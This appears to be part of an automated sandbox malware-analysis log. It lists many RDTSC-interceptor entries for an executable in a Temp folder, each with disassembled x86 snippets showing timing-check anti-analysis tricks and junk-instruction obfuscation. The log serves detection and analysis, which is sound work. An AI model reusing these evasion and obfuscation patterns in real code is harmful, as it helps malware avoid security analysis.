Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7642A3 second address: 7642E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB424542846h 0x00000009 jp 00007FB424542846h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jno 00007FB42454284Eh 0x00000019 nop 0x0000001a mov ebx, dword ptr [ebp+122D3461h] 0x00000020 push 00000000h 0x00000022 sub ebx, dword ptr [ebp+122D3080h] 0x00000028 push 00000000h 0x0000002a mov edi, 112788B5h 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push esi 0x00000033 pop esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7642E1 second address: 7642F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76532D second address: 765331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765331 second address: 765335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765335 second address: 765357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB424542856h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765357 second address: 76535D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76642C second address: 766430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 766430 second address: 76643A instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76552F second address: 765535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76643A second address: 76643F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765535 second address: 765539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76643F second address: 766445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765539 second address: 765548 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 766445 second address: 766465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, dword ptr [ebp+122D2AF1h] 0x0000000e push 00000000h 0x00000010 mov ebx, ecx 0x00000012 push 00000000h 0x00000014 sub ebx, dword ptr [ebp+122D2B15h] 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 766465 second address: 76647B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007FB424542846h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765606 second address: 76560C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76560C second address: 765612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765612 second address: 76562C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76562C second address: 765636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765636 second address: 76563A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 767317 second address: 767322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FB424542846h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 767322 second address: 767393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB4246CBDE8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D30D4h], edx 0x0000002a push eax 0x0000002b or bx, 6BBAh 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 jmp 00007FB4246CBDEDh 0x00000038 push 00000000h 0x0000003a mov ebx, ecx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jnc 00007FB4246CBDE6h 0x00000045 jnl 00007FB4246CBDE6h 0x0000004b popad 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FB4246CBDF5h 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76920A second address: 769210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769210 second address: 769216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7698E2 second address: 769977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB424542858h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jc 00007FB424542848h 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 jmp 00007FB424542851h 0x0000001d pop ecx 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FB424542848h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a sub edi, 3C893B24h 0x00000040 push 00000000h 0x00000042 or dword ptr [ebp+1248120Ah], edx 0x00000048 sub dword ptr [ebp+122D30DDh], ecx 0x0000004e push 00000000h 0x00000050 or bx, C321h 0x00000055 js 00007FB424542847h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FB42454284Eh 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769977 second address: 769981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76A993 second address: 76A9BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FB424542854h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76A9BB second address: 76AA50 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB4246CBDE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FB4246CBDE8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jl 00007FB4246CBDECh 0x0000002b mov dword ptr [ebp+122D3041h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FB4246CBDE8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov bx, ax 0x00000050 movzx ebx, bx 0x00000053 push 00000000h 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FB4246CBDE8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jp 00007FB4246CBDE8h 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 767565 second address: 76756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76756C second address: 767585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jbe 00007FB4246CBDE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnp 00007FB4246CBDF4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76BA80 second address: 76BA98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769B6C second address: 769B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769B70 second address: 769B83 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FB424542846h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76C91A second address: 76C91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76BBBE second address: 76BC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D28E1h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FB424542848h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FB424542848h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 sub bl, FFFFFFDAh 0x00000054 movzx ebx, cx 0x00000057 mov eax, dword ptr [ebp+122D0491h] 0x0000005d mov dword ptr [ebp+12462AA9h], edx 0x00000063 mov dword ptr [ebp+122D33F7h], ecx 0x00000069 push FFFFFFFFh 0x0000006b mov dword ptr [ebp+122D2D98h], esi 0x00000071 jmp 00007FB424542859h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b push ecx 0x0000007c pop ecx 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76BC5B second address: 76BC61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 771DEC second address: 771DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB424542848h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 771DFC second address: 771E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 707D13 second address: 707D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 707D19 second address: 707D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 776415 second address: 776419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 776419 second address: 776424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 775EB9 second address: 775F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FB424542846h 0x0000000c popad 0x0000000d jg 00007FB42454285Eh 0x00000013 jmp 00007FB424542858h 0x00000018 popad 0x00000019 push ebx 0x0000001a jg 00007FB424542863h 0x00000020 jbe 00007FB424542846h 0x00000026 jmp 00007FB424542857h 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e pop esi 0x0000002f jmp 00007FB424542851h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 775F1E second address: 775F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A6EC second address: 77A6F6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A6F6 second address: 77A71C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A71C second address: 77A722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A722 second address: 77A74A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FB4246CBDF6h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A855 second address: 77A85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB424542846h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76CB22 second address: 76CB2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7802A6 second address: 7802C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB424542859h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780469 second address: 78046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7808E8 second address: 7808F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB424542846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7808F4 second address: 78091B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDF9h 0x00000009 jmp 00007FB4246CBDEAh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78091B second address: 78091F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78091F second address: 780928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780CF0 second address: 780D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB424542857h 0x0000000d pushad 0x0000000e ja 00007FB424542846h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780D18 second address: 780D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780D1E second address: 780D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780D23 second address: 780D2D instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4246CBDF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780E94 second address: 780E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780E9A second address: 780EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780EA0 second address: 780EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780EA4 second address: 780EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4246CBDECh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jne 00007FB4246CBDE6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e jmp 00007FB4246CBDEDh 0x00000023 push eax 0x00000024 push edx 0x00000025 js 00007FB4246CBDE6h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 784246 second address: 78424B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A14E second address: 75A197 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4246CBDF4h 0x00000008 jmp 00007FB4246CBDEEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FB4246CBDF1h 0x00000015 nop 0x00000016 sbb dx, A4E7h 0x0000001b lea eax, dword ptr [ebp+1248EF3Dh] 0x00000021 add dx, 3AF4h 0x00000026 cld 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jns 00007FB4246CBDE6h 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A197 second address: 75A19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A19D second address: 75A1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A1A1 second address: 7399E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ecx, esi 0x00000010 sub dword ptr [ebp+122D1996h], ebx 0x00000016 call dword ptr [ebp+122D1DB2h] 0x0000001c push edi 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FB424542858h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A77A second address: 75A780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A780 second address: 75A797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007FB424542846h 0x00000010 je 00007FB424542846h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A797 second address: 75A7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A7A1 second address: 75A7C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB42454284Dh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A8F2 second address: 75A8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A976 second address: 75A97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
